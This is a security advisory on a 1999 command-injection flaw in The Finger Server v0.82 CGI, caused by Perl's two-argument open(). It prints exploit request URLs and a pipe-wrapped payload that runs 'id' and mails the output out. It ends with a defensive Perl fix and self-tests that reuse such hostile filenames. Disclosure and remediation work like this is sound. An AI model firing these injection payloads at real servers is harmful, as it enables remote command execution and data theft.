"The Finger Server" execute shell commands

Vulnerability
  "The Finger Server"
Affected

"The Finger Server"
Description

Iain Wade found the following. In 1999, he was tinkering with The Finger Server v0.82 and came across some bugs which let you execute shell commands under the privileges of the web server. The Finger Server is available at glazed.org.

It's just another case of Perl doing its magic on an open() call. There are undoubtedly other problems, but the offending code exploited here is:

        open (PLANS, "$plan_path$filename") ||
                do { print "Can't open $plan_path$filename: $!";
                     return;
                   };

It is called with the following arguments:

finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.plan

It does minimal checking before that point, really only making sure the username is valid, but for example by using:

finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.username.||

you can execute whatever... The output will obviously not get to you (the web client) if you use ||, but it does get executed. So an example to test it could be:

|id|mail+email@address|

Surrounding it in pipes is the only way one could get it to execute; otherwise it would return open errors.
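
One way to close this hole, as an added example that is not The Finger Server's code or part of the original advisory: check the filename against an allow-list pattern and use three-argument open(), which never treats a leading or trailing | as a command. The open_plan name, the throwaway-directory self-check and the filename pattern (inferred from the sample request above) are assumptions.

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Assumed archive name format, inferred from the sample request on this page:
# yy.mm.dd.hh.mm.username.plan
my $PLAN_NAME = qr/\A\d{2}(?:\.\d{2}){4}\.[A-Za-z0-9_-]{1,32}\.plan\z/;

# Returns (filehandle, undef) on success or (undef, reason) on failure.
sub open_plan {
    my ($plan_path, $filename) = @_;

    # Allow-list check: rejects '|', '/', '..', NUL, whitespace, anything else.
    return (undef, 'invalid filename')
        unless defined $filename && $filename =~ $PLAN_NAME;

    # Three-argument open: the mode is fixed to '<', so the path is never
    # parsed for a leading or trailing '|' and is only ever read as a file.
    open(my $fh, '<', "$plan_path$filename")
        or return (undef, 'cannot open plan');   # do not echo $! or the path
    return ($fh, undef);
}

# Self-check with constructed inputs in a throwaway directory.
my $dir  = tempdir(CLEANUP => 1) . '/';
my $good = '99.10.28.15.23.username.plan';
open(my $out, '>', "$dir$good") or die "setup failed: $!";
print {$out} "sample plan\n";
close $out;

my @cases = (
    [ $good,                            1 ],  # well-formed archive name
    [ '99.10.28.15.23.username.|id|',   0 ],  # pipe-wrapped value is refused
    [ '../../etc/passwd',               0 ],  # traversal is refused as well
    [ "99.10.28.15.23.username.plan\n", 0 ],  # \z rejects a trailing newline
);

for my $case (@cases) {
    my ($name, $expect_ok) = @$case;
    my ($fh, $err) = open_plan($dir, $name);
    my $ok = defined $fh ? 1 : 0;
    die "unexpected result for input\n" unless $ok == $expect_ok;
    (my $shown = $name) =~ s/\n/\\n/g;
    printf "%-34s %s\n", $shown, $ok ? 'opened' : "rejected ($err)";
    close $fh if $fh;
}
```

Either measure alone stops the command execution described here; the pattern check additionally keeps the request inside the plan directory.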

source:artofhacking.


